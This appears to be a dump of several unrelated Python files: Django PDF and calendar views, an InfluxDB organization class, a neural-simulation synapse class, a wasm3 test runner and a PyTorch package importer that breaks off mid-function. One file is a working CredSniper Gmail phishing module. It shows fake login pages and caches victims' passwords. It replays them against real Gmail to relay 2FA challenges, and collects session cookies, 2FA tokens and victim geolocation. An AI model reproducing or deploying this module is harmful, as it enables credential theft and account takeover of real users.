pdf_reactor.setAddTags(True)
pdf_reactor.setAddBookmarks(True)
pdf_reactor.addUserStyleSheet('', '', '', self.get_stylesheet_url())
query_string = self.request.GET.urlencode()
result = \
pdf_reactor.renderDocumentFromURL('{0}?{1}'.format(
self.get_render_url(),
query_string))
# Check if successful
if result is None:
# Not successful, return 500
raise Exception('Error while rendering PDF: {}'.format(
pdf_reactor.getError()))
else:
# Set the correct header for PDF output
response = HttpResponse(result, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename={0}'.format(
self.get_filename())
return response
def get(self, *args, **kwargs):
return self.generate_pdf()
class ICSView(ContextMixin, View):
"""
Returns an .ics file for a given calendar event
"""
# Contants
event_calendar_prodid = '-//CFPB//Calendar Item//EN',
event_source = None
# Default variables
event_summary = ''
event_dtstart = '2015-01-01T00:00:00'
event_dtend = '2015-01-01T00:00:00'
event_dtstamp = '2015-01-01T00:00:00'
event_uid = ''
event_priority = 1
event_organizer = ''
event_organizer_addr = ''
event_location = ''
event_status = 'TENTATIVE'
def get_event_source(self):
if self.event_source is None:
raise ImproperlyConfigured(
"ICSView requires an 'event_source' to be set.")
return self.event_source
def get_event_json(self, event_slug):
source_template = self.get_event_source()
source_url = source_template.replace('<event_slug>', event_slug)
source_response = requests.get(source_url)
try:
self.event_json = source_response.json()['ics']
except ValueError:
self.event_json = {}
return source_response.status_code
def get_field_value(self, attribute):
"""
Check if the attribute keyname was passed in; if so, get the value
Otherwise, use the default attribute on this base class
"""
attribute_variable = "{}_keyname".format(attribute)
try:
attribute_value = getattr(self, attribute_variable)
return self.event_json.get(attribute_value, '')
except AttributeError:
attribute_value = getattr(self, attribute)
return attribute_value
def make_date_tz_aware(self, date, tzinfo_field):
"""
Convert datetime-naive date to a datetime-aware date
Specifically setting a location/TZ like this is required by icalendar
"""
naive_date = parse(date)
if self.event_json.get(tzinfo_field):
tzname = self.event_json[tzinfo_field]
aware_date = naive_date.astimezone(timezone(tzname))
else:
aware_date = timezone('UTC').localize(naive_date)
return aware_date
def generate_ics(self, event_slug):
# Get the event json from our source
source_status = self.get_event_json(event_slug)
if source_status != 200:
return HttpResponse('', status=source_status)
# Create the Calendar
calendar = icalendar.Calendar()
calendar.add('prodid', self.event_calendar_prodid)
calendar.add('version', '2.0')
calendar.add('method', 'publish')
# Create the event
event = icalendar.Event()
# Populate the event
event.add('summary', self.get_field_value('event_summary'))
event.add('uid', self.get_field_value('event_uid'))
event.add('location', self.get_field_value('event_location'))
dtstart = self.make_date_tz_aware(self.get_field_value('event_dtstart'),
'starting_tzidnfo')
dtend = self.make_date_tz_aware(self.get_field_value('event_dtend'),
'ending_tzidnfo')
event.add('dtstart', dtstart)
event.add('dtend', dtend)
event.add('dtstamp', parse(self.get_field_value('event_dtstamp')))
event.add('status', self.get_field_value('event_status'))
# Create any persons associated with the event
if self.get_field_value('event_organizer_addr') and \
self.get_field_value('event_organizer'):
organizer = icalendar.vCalAddress(
'MAILTO:' + self.get_field_value('event_organizer_addr'))
organizer.params['cn'] = icalendar.vText(
self.get_field_value('event_organizer'))
event.add('organizer', organizer)
# Add the event to the calendar
calendar.add_component(event)
# Return the ICS formatted calendar
response = HttpResponse(calendar.to_ical(),
content_type='text/calendar',
status=source_status,
charset='utf-8')
response['Content-Disposition'] = 'attachment;filename={}.ics'.format(
event_slug)
return response
def get(self, *args, **kwargs):
event_slug = kwargs.get('doc_id')
return self.generate_ics(event_slug) if event_slug else Http404
|
# Copyright 2021 Hoplite Industries, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Organization Object
===================
This object is based on the following JSON structure that comes back
from InfluxDB.
.. _json-org-structure:
JSON Response for an Organization.
.. code-block:: json
{
"links": {
"self": "/api/v2/orgs/1",
"members": "/api/v2/orgs/1/members",
"owners": "/api/v2/orgs/1/owners",
"labels": "/api/v2/orgs/1/labels",
"secrets": "/api/v2/orgs/1/secrets",
"buckets": "/api/v2/buckets?org=myorg",
"tasks": "/api/v2/tasks?org=myorg",
"dashboards": "/api/v2/dashboards?org=myorg"
},
"id": "string",
"name": "string",
"description": "string",
"createdAt": "2019-08-24T14:15:22Z",
"updatedAt": "2019-08-24T14:15:22Z",
"status": "active"
}
"""
import json as jsonlib
import re
import typing
# 3rd party
import ciso8601
# Local imports
from .. import types
INVALID = "-invalid-"
class Org: # pylint: disable=R0902,C0103
"""Object describing an InfluxDB Organization.
Parameters:
name (str): *Optional* Name of the Organization.
description (str): *Optional* Long description for the Organization.
org_id (str): *Optional* The org ID for the Organization. This will
be a 16 digit hex string.
"""
def __init__(
self,
name: typing.Optional[str] = None,
description: typing.Optional[str] = None,
org_id: typing.Optional[str] = None,
):
self._name = name if name else INVALID
# Subtle, but empty string "" becomes None
self._description = description if description else None
self._org_id = org_id if org_id else INVALID
self._active = True
self._created_at = 0
self._updated_at = 0
self._links = {}
def _reset(self):
self._name = INVALID
self._description = None
self._org_id = INVALID
self._active = True
self._created_at = 0
self._updated_at = 0
self._links = {}
@property
def name(self) -> str:
"""Name of the organization."""
if self._name == INVALID:
raise ValueError(
"%s.name referenced before being assigned a value."
% (__class__.__name__)
)
return self._name
@name.setter
def name(self, value: str):
if not isinstance(value, str):
raise ValueError(
"%s.name must be a string." % (__class__.__name__)
)
if value == INVALID:
raise ValueError(
"%s.name %s is a restricted value."
% (__class__.__name__, repr(INVALID))
)
if not value:
raise ValueError(
"%s.name must not be empty." % (__class__.__name__)
)
self._name = value
@property
def description(self) -> types.NullStr:
"""Description of the organization."""
return self._description
@description.setter
def description(self, value: types.NullStr):
if value is not None:
if not isinstance(value, str):
raise ValueError("Description must be a string or None.")
self._description = value
@property
def id(self) -> str:
"""Organization ID from InfluxDB."""
if self._org_id == INVALID:
raise ValueError(
"%s.id reference before being assigned a value."
% (__class__.__name__)
)
return self._org_id
@id.setter
def id(self, value: str):
if not isinstance(value, str):
raise ValueError("%s.id must be a string." % (__class__.__name__))
if not types.ID_REGEX.match(value):
raise ValueError(
"%s.id must be a 16 character hex string."
% (__class__.__name__)
)
self._org_id = value
@property
def created(self) -> float:
"""Timestamp of when the org was created.
The value is seconds since Jan 1, 1970 00:00:00 GMT.
Raises:
ValueError: when an invalid value is encountered.
"""
return self._created_at
@created.setter
def created(self, value: types.TimeVal):
if isinstance(value, (int, float)):
self._created_at = float(value)
elif isinstance(value, str):
dt = ciso8601.parse_datetime(value)
self._created_at = dt.timestamp()
else:
raise ValueError(
"Invalid type for a timestamp: %s" % (type(value))
)
@property
def updated(self) -> float:
"""Timestamp of when the org was last updated.
The value is seconds since Jan 1, 1970 00:00:00 GMT.
Raises:
ValueError: when an invalid value is encountered.
"""
return self._updated_at
@updated.setter
def updated(self, value: types.TimeVal):
if isinstance(value, (int, float)):
self._updated_at = float(value)
elif isinstance(value, str):
dt = ciso8601.parse_datetime(value)
self._updated_at = dt.timestamp()
else:
raise ValueError(
"Invalid type for a timestamp: %s" % (type(value))
)
@property
def active(self) -> bool:
"""Whether or not the organization is active."""
return self._active
@active.setter
def active(self, value: bool):
if not isinstance(value, bool):
raise ValueError(
"%s.active must be a bool value." % (__class__.__name__)
)
self._active = value
@property
def links(self) -> dict:
"""Links associated with this org."""
return self._links
@links.setter
def links(self, value):
if not isinstance(value, dict):
raise ValueError(
"%s.links Must be a dictionary not [%s]"
% (__class__.__name__, type(value))
)
# Duplicate the links to prevent odd corruption
self._links = {str(x): str(value[x]) for x in value}
def from_dict(self, data: dict):
"""Fill object from a dictionary object.
Parameters:
data: Dictionary containing an org response from InfluxDB.
See the :ref:`JSON Org Structure <json-org-structure>` for
details on what the dictionary should look like.
"""
try:
self.id = data["id"]
self.name = data["name"]
self.description = data["description"]
self.created = data["createdAt"]
self.updated = data["updatedAt"]
status = data.get("status", "active")
self.active = status == "active"
self.links = data["links"]
except ValueError as err:
self._reset()
raise ValueError(
"%s.from_dict() Invalid dictionary, missing key [%s]"
% (__class__.__name__, err)
) from None
def from_json(self, data: typing.Union[str, bytes]):
"""Fill object from a json string.
Parameters:
data: Dictionary containing an org response from InfluxDB.
See the :ref:`JSON Org Structure <json-org-structure>` for
details on what the JSON should look like.
"""
try:
dictdata = jsonlib.loads(data)
except jsonlib.JSONDecodeError as err:
raise ValueError(
"%s.from_json() Invalid json data: %s"
% (__class__.__name__, err)
) from None
try:
self.from_dict(dictdata)
except ValueError as err:
raise ValueError(
"%s.from_json() Invalid json data: %s"
% (__class__.__name__, err)
) from None
|
from collections import defaultdict
from neuronpp.core.decorators import distparams
from neuronpp.core.cells.netcon_cell import NetConCell
from neuronpp.core.hocwrappers.synapses.single_synapse import SingleSynapse
class SynapticCell(NetConCell):
def __init__(self, name=None, compile_paths=None):
NetConCell.__init__(self, name, compile_paths=compile_paths)
self.syns = []
self._syn_num = defaultdict(int)
def filter_synapses(self, mod_name: str = None, obj_filter=None, name=None, source=None,
point_process=None, parent=None, tag=None, **kwargs):
"""
Currently all filter passed are treated as AND statements.
* Whole object callable function passed to the obj_filter param.
eg. (lambda expression) returns sections which name contains 'apic' or
their distance > 1000 um from the soma:
```
soma = cell.filter_secs("soma")
cell.filter_secs(obj_filter=lambda o: 'apic' in o.name or
h.distance(soma.hoc(0.5), o.hoc(0.5)) > 1000)
```
* Single object field filter based on callable function passed to the obj_filter param.
eg. (lambda expression) returns sections which parent's name contains less than 10
characters
```
cell.filter_secs(parent=lambda o: len(o.parent.name) < 10)
```
:param mod_name:
single string defining name of point process type name, eg. concere synaptic mechanisms
like Syn4PAChDa
:param obj_filter:
Whole object callable functional filter. If you added also any kwargs they will be
together with the
obj_filter treated as AND statement.
:param name:
start with 'regex:any pattern' to use regular expression. If without 'regex:' -
will look which Hoc objects contain the str
:param source:
string of source compound name (if source is provided)
:param point_process:
string of point process compound name
:return:
"""
return self.filter(self.syns, obj_filter=obj_filter, mod_name=mod_name, name=name,
source=source, point_process=point_process, parent=parent,
tag=tag, **kwargs)
def remove_synapses(self, mod_name: str = None, obj_filter=None, name=None, source=None,
point_process=None, parent=None, tag=None, **kwargs):
"""
Currently all filter passed are treated as AND statements.
* Whole object callable function passed to the obj_filter param.
eg. (lambda expression) returns sections which name contains 'apic' or
their distance > 1000 um from the soma:
```
soma = cell.filter_secs("soma")
cell.filter_secs(obj_filter=lambda o: 'apic' in o.name or
h.distance(soma.hoc(0.5), o.hoc(0.5)) > 1000)
```
* Single object field filter based on callable function passed to the obj_filter param.
eg. (lambda expression) returns sections which parent's name contains less than 10
characters
```
cell.filter_secs(parent=lambda o: len(o.parent.name) < 10)
```
:param mod_name:
single string defining name of point process type name, eg. concere synaptic mechanisms
like Syn4PAChDa
:param obj_filter:
Whole object callable functional filter. If you added also any kwargs they will be
together with the
obj_filter treated as AND statement.
:param name:
start with 'regex:any pattern' to use regular expression. If without 'regex:' -
will look which Hoc objects contain the str
:param source:
string of source compound name (if source is provided)
:param point_process:
string of point process compound name
:return:
"""
return self.remove(self.syns, obj_filter=obj_filter, mod_name=mod_name, name=name,
source=source, point_process=point_process, parent=parent,
tag=tag, **kwargs)
@distparams
def add_synapse(self, source, mod_name: str, seg, netcon_weight=1, delay=1, threshold=10,
tag: str = None, **synaptic_params):
"""
:param source:
Can be only: hocwrappers.NetStim, hocwrappers.VecStim, Seg or None.
If None it will create NetConn with no source, which can be use as external event source
:param netcon_weight:
:param tag:
:param mod_name:
:param seg:
:param source_loc:
:param target_loc:
:param delay:
:param threshold:
:param synaptic_params:
:return:
"""
pp = self.add_point_process(mod_name=mod_name, seg=seg, tag=tag, **synaptic_params)
nn = self.add_netcon(source=source, netcon_weight=netcon_weight, point_process=pp,
delay=delay, threshold=threshold)
syn_name = "%s[%s]" % (pp.name, self._syn_num[mod_name])
syn = SingleSynapse(source, point_process=pp, netcon=nn, name=syn_name, tag=tag)
self.syns.append(syn)
self._syn_num[mod_name] += 1
return syn
|
from __future__ import print_function
from flask import redirect, request, jsonify, Markup
from os import system
from core import functions
from core.base_module import *
import uuid
import mechanicalsoup
import bs4
import re, sys, time, random
import time
import json
class GmailModule(BaseModule):
def __init__(self, enable_2fa=False):
super().__init__(self)
self.set_name('gmail')
self.add_route('main', '/')
self.add_route('accounts', '/accounts')
self.add_route('authenticate', '/authenticate')
self.add_route('redirect', '/redirect')
self.enable_two_factor(enable_2fa)
def main(self):
next_url = '/accounts'
template = self.env.get_template('login.html')
return template.render(
next_url=next_url,
hostname=request.host,
)
def accounts(self):
self.user = request.values.get('email')
next_url = '/authenticate'
template = self.env.get_template('password.html')
return template.render(
hostname=request.host,
next_url=next_url,
email=self.user
)
def authenticate(self):
self.user = request.values.get('email')
self.password = request.values.get('password')
functions.cache_creds(self.name, self.user, self.password)
triggered = self.trigger()
redirect_user = triggered.get('action', None)
if redirect_user == 'redirect':
return redirect(self.final_url, code=302)
if not self.enable_2fa:
return redirect(self.final_url, code=302)
twofactor_type = triggered.get('type', 'error')
twofactor_code = triggered.get('code', None)
twofactor_name = triggered.get('name', None)
if twofactor_type == 'touchscreen':
if twofactor_code:
additional = Markup(
', then touch number <strong>{}</strong>.'.format(
twofactor_code
)
)
twofactor_code = additional
else:
twofactor_code = '.'
tf_type = '{}.html'.format(twofactor_type)
template = self.env.get_template(tf_type)
next_url = '/redirect'
return template.render(
hostname=request.host,
next_url=next_url,
enable_2fa=self.enable_2fa,
email=self.user,
password=self.password,
code=twofactor_code,
name=twofactor_name,
two_factor_type=twofactor_type,
first_name=''
)
def redirect(self):
self.user = request.values.get('email')
self.password = request.values.get('password')
self.two_factor_token = request.values.get('two_factor_token')
self.two_factor_type = request.values.get('two_factor_type')
city, region, zip_code = '','',''
try:
geoip_url = 'https://freegeoip.net/json/{}'.format(
request.remote_addr
)
geo_browser = mechanicalsoup.StatefulBrowser()
geo_response = geo_browser.open(geoip_url)
geo = json.loads(geo_response.text)
city = geo['city']
region = geo['region_name']
zip_code = geo['zip_code']
except Exception as ex:
pass
functions.store_creds(
self.name,
self.user,
self.password,
self.two_factor_token,
self.two_factor_type,
request.remote_addr,
city,
region,
zip_code
)
return redirect(self.final_url, code=302)
def trigger(self):
raw_headers = None
data_2fa = {
'type': None,
'code': None,
'name': None,
'action': None,
'headers': [],
'cookies': [],
}
try:
browser = mechanicalsoup.StatefulBrowser(
soup_config={'features': 'html'},
raise_on_404=True,
user_agent='Python-urllib/2.7',
)
page = browser.open('https://www.gmail.com')
user_form = browser.select_form('form')
user_form.set('Email', self.user)
user_response = browser.submit(user_form, page.url)
pass_form = mechanicalsoup.Form(user_response.soup.form)
pass_form.set('Passwd', self.password)
pass_response = browser.submit(pass_form, page.url)
raw_headers = pass_response.headers
soup = pass_response.soup
raw = soup.text
sms = soup.find('input', {'id': 'idvPreregisteredPhonePin'})
sms_old = soup.find('button', {'id': 'idvPreresteredPhoneSms'})
u2f = soup.find('input', {'id': 'id-challenge'})
touch = soup.find('input', {'id': 'authzenToken'})
authenticator = soup.find('input', {'id': 'totpPin'})
backup = soup.find('input', {'id': 'backupCodePin'})
if sms or sms_old:
data_2fa['type'] = 'sms'
if sms_old:
final_form = mechanicalsoup.Form(pass_response.soup.form)
final_response = browser.submit(final_form, page.url)
raw_headers = final_response.headers
raw = final_response.soup.text
data_2fa['type'] = 'u2f'
code = ''
regexes = [
r"\d{2}(?=</b>)",
r"(?<=\u2022)\d{2}(?=G)",
r"\d{2}(?=G)",
r"\d{2}(?=\</b>)",
r"\d{2}(?=S)",
]
for regex in regexes:
matches = re.search(regex, raw, re.UNICODE)
if matches:
code = matches.group()
break
else:
code = '••'
data_2fa['code'] = code
elif u2f:
data_2fa['type'] = 'u2f'
elif touch:
code = ''
name = ''
regex_codes = [
r"(?<=<b>)\d{1,3}(?=</b>)",
r"(?<=then tap )\d{1,3}(?= on your phone)"
]
for regex_code in regex_codes:
code_match = re.search(regex_code, raw)
if code_match:
code = code_match.group()
else:
code = 0
regex_names = [
r"(?<=Unlock your ).*(?=Tap)",
r"(?<=Check your ).*(?=<\/h2>)",
]
for regex_name in regex_names:
name_match = re.search(regex_name, raw)
if name_match:
name = name_match.group()
else:
name = 'phone'
data_2fa['code'] = code
data_2fa['name'] = name
data_2fa['type'] = 'touchscreen'
elif authenticator:
name = ''
regexes = [
r"(?<=Get a verification code from the <strong>).*(?=<\/strong>)",
r"(?<=Get a verification code from the ).*(?= app)",
]
for regex in regexes:
name_match = re.search(regex, raw, re.UNICODE)
if name_match:
name = name_match.group()
else:
name = 'authenticator app'
data_2fa['name'] = name
data_2fa['type'] = 'authenticator'
elif backup:
data_2fa['type'] = 'backup'
else:
if 'Try again in a few hours' in raw:
data_2fa['error'] ='locked out'
data_2fa['action'] = 'redirect'
cookies = []
for c in browser.get_cookiejar():
cookie = {}
cookie['name'] = c.name
cookie['value'] = c.value
cookie['domain'] = c.domain
cookie['path'] = c.path
cookie['secure'] = c.secure
cookie['expires'] = c.expires
cookies.append(cookie)
data_2fa['cookies'] = cookies
for h in raw_headers:
header = {}
header['name'] = h
header['value'] = raw_headers[h]
data_2fa['headers'].append(header)
except Exception as ex:
data_2fa['error'] = ex
pass
return data_2fa
# REQUIRED: When module is loaded, credsniper calls load()
def load(enable_2fa=False):
'''Initial load() function called from importlib in the main CredSniper functionality.'''
return GmailModule(enable_2fa)
|
#!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-wasi-test.py
# ./run-wasi-test.py --exec ../custom_build/wasm3 --timeout 120
# ./run-wasi-test.py --exec "wasmer run --mapdir=/:." --separate-args
# ./run-wasi-test.py --exec "wasmer run --mapdir=/:. wasm3.wasm --" --fast
import argparse
import sys
import subprocess
import hashlib
import fnmatch
sys.path.append('../extra')
from testutils import *
from pprint import pprint
#
# Args handling
#
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3")
parser.add_argument("--separate-args", action='store_true') # use "--" separator for wasmer, wasmtime
parser.add_argument("--timeout", type=int, default=120)
parser.add_argument("--fast", action='store_true')
args = parser.parse_args()
stats = dotdict(total_run=0, failed=0, crashed=0, timeout=0)
commands_full = [
{
"name": "Simple WASI test",
"wasm": "./wasi/simple/test.wasm",
"args": ["cat", "/wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; /wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"name": "Simple WASI test (wasm-opt -O3)",
"wasm": "./wasi/simple/test-opt.wasm",
"args": ["cat", "./wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; ./wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"name": "mandelbrot",
"wasm": "./wasi/mandelbrot/mandel.wasm",
"args": ["128", "4e5"],
"expect_sha1": "37091e7ce96adeea88f079ad95d239a651308a56"
}, {
"name": "mandelbrot (doubledouble)",
"wasm": "./wasi/mandelbrot/mandel_dd.wasm",
"args": ["128", "4e5"],
"expect_sha1": "b3f904daf1c972b4f7d3f8996743cb5b5146b877"
}, {
"name": "C-Ray",
"stdin": "./wasi/c-ray/scene",
"wasm": "./wasi/c-ray/c-ray.wasm",
"args": ["-s", "128x128"],
"expect_sha1": "90f86845ae227466a06ea8db06e753af4838f2fa"
}, {
"name": "smallpt (explicit light sampling)",
"wasm": "./wasi/smallpt/smallpt-ex.wasm",
"args": ["16", "64"],
"expect_sha1": "d85df3561eb15f6f0e6f20d5640e8e1306222c6d"
}, {
"skip": True, # Fails on Windows on CI only, CNR
"name": "mal",
"wasm": "./wasi/mal/mal.wasm",
"args": ["./wasi/mal/test-fib.mal", "16"],
"expect_pattern": "987\n",
}, {
"name": "STREAM",
"wasm": "./wasi/stream/stream.wasm",
"expect_pattern": "----*Solution Validates:*on all three arrays*----*"
}, {
# TODO "if": { "file_exists": "./self-hosting/wasm3-fib.wasm" },
"name": "Self-hosting",
"wasm": "./self-hosting/wasm3-fib.wasm",
"expect_pattern": "wasm3 on WASM*Result: 832040*Elapsed: * ms*"
}, {
"name": "Brotli",
"stdin": "./wasi/brotli/alice29.txt",
"wasm": "./wasi/brotli/brotli.wasm",
"args": ["-c", "-f"],
"expect_sha1": "8eacda4b80fc816cad185330caa7556e19643dff"
}, {
"name": "CoreMark",
"wasm": "./wasi/coremark/coremark.wasm",
"expect_pattern": "*Correct operation validated.*CoreMark 1.0 : * / Clang* / STATIC*"
}
]
commands_fast = [
{
"name": "Simple WASI test",
"wasm": "./wasi/simple/test.wasm",
"args": ["cat", "./wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; ./wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"skip": True, # Backtraces not enabled by default
"name": "Simple WASI test",
"wasm": "./wasi/test.wasm",
"args": ["trap"],
"can_crash": True,
"expect_pattern": "Hello world*Constructor OK*Args: *; trap;* wasm backtrace:* 6: 0x*Error:* unreachable executed*"
}, {
"name": "mandelbrot",
"wasm": "./wasi/mandelbrot/mandel.wasm",
"args": ["32", "4e5"],
"expect_sha1": "1fdb7dea7ec0f2465054cc623dc5a7225a876361"
}, {
"name": "mandelbrot (doubledouble)",
"wasm": "./wasi/mandelbrot/mandel_dd.wasm",
"args": ["32", "4e5"],
"expect_sha1": "b6d3c158a5c0dff1f6e82a3556c071e4f8b9e3f0"
}, {
"name": "C-Ray",
"stdin": "./wasi/c-ray/scene",
"wasm": "./wasi/c-ray/c-ray.wasm",
"args": ["-s", "32x32"],
"expect_sha1": "05af9604bf352234276e4d64e84b8d666574316c"
}, {
"name": "smallpt (explicit light sampling)",
"wasm": "./wasi/smallpt/smallpt-ex.wasm",
"args": ["4", "32"],
"expect_sha1": "ea05d85998b2f453b588ef76a1256215bf9b851c"
}, {
"name": "mal",
"wasm": "./wasi/mal/mal.wasm",
"args": ["./wasi/mal/test-fib.mal", "16"],
"expect_pattern": "987\n",
}, {
"name": "Brotli",
"stdin": "./wasi/brotli/alice29_small.txt",
"wasm": "./wasi/brotli/brotli.wasm",
"args": ["-c", "-f"],
"expect_sha1": "0e8af02a7207c0c617d7d38eed92853c4a619987"
}
]
def fail(msg):
print(f"{ansi.FAIL}FAIL:{ansi.ENDC} {msg}")
stats.failed += 1
commands = commands_fast if args.fast else commands_full
for cmd in commands:
if "skip" in cmd:
continue
command = args.exec.split(' ')
command.append(cmd['wasm'])
if "args" in cmd:
if args.separate_args:
command.append("--")
command.extend(cmd['args'])
command = list(map(str, command))
print(f"=== {cmd['name']} ===")
stats.total_run += 1
try:
if "stdin" in cmd:
fn = cmd['stdin']
f = open(fn, "rb")
print(f"cat {fn} | {' '.join(command)}")
output = subprocess.check_output(command, timeout=args.timeout, stdin=f)
elif "can_crash" in cmd:
print(f"{' '.join(command)}")
output = subprocess.run(command, timeout=args.timeout, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout
else:
print(f"{' '.join(command)}")
output = subprocess.check_output(command, timeout=args.timeout)
except subprocess.TimeoutExpired:
stats.timeout += 1
fail("Timeout")
continue
except subprocess.CalledProcessError:
stats.crashed += 1
fail("Crashed")
continue
if "expect_sha1" in cmd:
actual = hashlib.sha1(output).hexdigest()
if actual != cmd['expect_sha1']:
fail(f"Actual sha1: {actual}")
if "expect_pattern" in cmd:
actual = output.decode("utf-8")
if not fnmatch.fnmatch(actual, cmd['expect_pattern']):
fail(f"Output does not match pattern:\n{actual}")
print()
pprint(stats)
if stats.failed:
print(f"{ansi.FAIL}=======================")
print(f" FAILED: {stats.failed}/{stats.total_run}")
print(f"======================={ansi.ENDC}")
sys.exit(1)
else:
print(f"{ansi.OKGREEN}=======================")
print(f" All {stats.total_run} tests OK")
print(f"======================={ansi.ENDC}")
|
from .amine import *
from .aldehyde import *
from .halogen import *
from .misc import *
|
import builtins
import importlib
import inspect
import io
import linecache
import os.path
import types
from contextlib import contextmanager
from pathlib import Path
from typing import Any, BinaryIO, Callable, cast, Dict, List, Optional, Union
from weakref import WeakValueDictionary
import torch
from torch.serialization import _get_restore_location, _maybe_decode_ascii
from ._directory_reader import DirectoryReader
from ._importlib import (
_calc___package__,
_normalize_line_endings,
_normalize_path,
_resolve_name,
_sanity_check,
)
from ._mangling import demangle, PackageMangler
from ._package_unpickler import PackageUnpickler
from .file_structure_representation import _create_directory_from_file_list, Directory
from .glob_group import GlobPattern
from .importer import Importer
class PackageImporter(Importer):
"""Importers allow you to load code written to packages by :class:`PackageExporter`.
Code is loaded in a hermetic way, using files from the package
rather than the normal python import system. This allows
for the packaging of PyTorch model code and data so that it can be run
on a server or used in the future for transfer learning.
The importer for packages ensures that code in the module can only be loaded from
within the package, except for modules explicitly listed as external during export.
The file ``extern_modules`` in the zip archive lists all the modules that a package externally depends on.
This prevents "implicit" dependencies where the package runs locally because it is importing
a locally-installed package, but then fails when the package is copied to another machine.
"""
"""The dictionary of already loaded modules from this package, equivalent to ``sys.modules`` but
local to this importer.
"""
torch._C._log_api_usage_once("torch.package.PackageImporter")
modules: Dict[str, types.ModuleType]
def __init__(
self,
file_or_buffer: Union[str, torch._C.PyTorchFileReader, Path, BinaryIO],
module_allowed: Callable[[str], bool] = lambda module_name: True,
):
"""Open ``file_or_buffer`` for importing. This checks that the imported package only requires modules
allowed by ``module_allowed``
Args:
file_or_buffer: a file-like object (has to implement :meth:`read`, :meth:`readline`, :meth:`tell`, and :meth:`seek`),
a string, or an ``os.PathLike`` object containing a filename.
module_allowed (Callable[[str], bool], optional): A method to determine if a externally provided module
should be allowed. Can be used to ensure packages loaded do not depend on modules that the server
does not support. Defaults to allowing anything.
Raises:
ImportError: If the package will use a disallowed module.
"""
self.zip_reader: Any
if isinstance(file_or_buffer, torch._C.PyTorchFileReader):
self.filename = "<pytorch_file_reader>"
self.zip_reader = file_or_buffer
elif isinstance(file_or_buffer, (Path, str)):
self.filename = str(file_or_buffer)
if not os.path.isdir(self.filename):
self.zip_reader = torch._C.PyTorchFileReader(self.filename)
else:
self.zip_reader = DirectoryReader(self.filename)
else:
self.filename = "<binary>"
self.zip_reader = torch._C.PyTorchFileReader(file_or_buffer)
self.root = _PackageNode(None)
self.modules = {}
self.extern_modules = self._read_extern()
for extern_module in self.extern_modules:
if not module_allowed(extern_module):
raise ImportError(
f"package '{file_or_buffer}' needs the external module '{extern_module}' "
f"but that module has been disallowed"
)
self._add_extern(extern_module)
for fname in self.zip_reader.get_all_records():
self._add_file(fname)
self.patched_builtins = builtins.__dict__.copy()
self.patched_builtins["__import__"] = self.__import__
# Allow packaged modules to reference their PackageImporter
self.modules["torch_package_importer"] = self # type: ignore[assignment]
self._mangler = PackageMangler()
# used for reduce deserializaiton
self.storage_context: Any = None
self.last_map_location = None
# used for torch.serialization._load
self.Unpickler = lambda *args, **kwargs: PackageUnpickler(self, *args, **kwargs)
def import_module(self, name: str, package=None):
"""Load a module from the package if it hasn't already been loaded, and then return
the module. Modules are loaded locally
to the importer and will appear in ``self.modules`` rather than ``sys.modules``.
Args:
name (str): Fully qualified name of the module to load.
package ([type], optional): Unused, but present to match the signature of importlib.import_module. Defaults to ``None``.
Returns:
types.ModuleType: The (possibly already) loaded module.
"""
# We should always be able to support importing modules from this package.
# This is to support something like:
# obj = importer.load_pickle(...)
# importer.import_module(obj.__module__) <- this string will be mangled
#
# Note that _mangler.demangle will not demangle any module names
# produced by a different PackageImporter instance.
name = self._mangler.demangle(name)
return self._gcd_import(name)
def load_binary(self, package: str, resource: str) -> bytes:
"""Load raw bytes.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
Returns:
bytes: The loaded data.
"""
path = self._zipfile_path(package, resource)
return self.zip_reader.get_record(path)
def load_text(
self,
package: str,
resource: str,
encoding: str = "utf-8",
errors: str = "strict",
) -> str:
"""Load a string.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
encoding (str, optional): Passed to ``decode``. Defaults to ``'utf-8'``.
errors (str, optional): Passed to ``decode``. Defaults to ``'strict'``.
Returns:
str: The loaded text.
"""
data = self.load_binary(package, resource)
return data.decode(encoding, errors)
def load_pickle(self, package: str, resource: str, map_location=None) -> Any:
"""Unpickles the resource from the package, loading any modules that are needed to construct the objects
using :meth:`import_module`.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
map_location: Passed to `torch.load` to determine how tensors are mapped to devices. Defaults to ``None``.
Returns:
Any: The unpickled object.
"""
pickle_file = self._zipfile_path(package, resource)
restore_location = _get_restore_location(map_location)
loaded_storages = {}
loaded_reduces = {}
storage_context = torch._C.DeserializationStorageContext()
def load_tensor(dtype, size, key, location, restore_location):
name = f"{key}.storage"
if storage_context.has_storage(name):
storage = storage_context.get_storage(name, dtype).storage()
else:
tensor = self.zip_reader.get_storage_from_record(
".data/" + name, size, dtype
)
if isinstance(self.zip_reader, torch._C.PyTorchFileReader):
storage_context.add_storage(name, tensor)
storage = tensor.storage()
loaded_storages[key] = restore_location(storage, location)
def persistent_load(saved_id):
assert isinstance(saved_id, tuple)
typename = _maybe_decode_ascii(saved_id[0])
data = saved_id[1:]
if typename == "storage":
storage_type, key, location, size = data
dtype = storage_type.dtype
if key not in loaded_storages:
load_tensor(
dtype,
size,
key,
_maybe_decode_ascii(location),
restore_location,
)
storage = loaded_storages[key]
